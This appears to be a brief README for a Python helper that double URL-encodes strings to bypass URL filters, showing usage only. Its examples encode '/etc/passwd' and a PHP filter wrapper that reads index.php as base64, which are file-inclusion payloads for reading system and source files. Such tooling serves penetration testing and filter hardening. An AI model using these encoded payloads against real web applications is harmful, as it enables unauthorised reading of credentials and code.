# URL Double Encoding

Bypass URL filter

### Source

[url_double_encoding.py](url_double_encoding.py)

### Example

```sh
$ python3 url_double_encoding.py 
Use : url_double_encoding.py text

$ python3 url_double_encoding.py /etc/passwd
%252Fetc%252Fpasswd

$ python3 url_double_encoding.py php://filter/read=convert.base64-encode/resource=index.php 
php%253A%252F%252Ffilter%252Fread%253Dconvert%252Ebase64-encode%252Fresource%253Dindex%252Ephp
```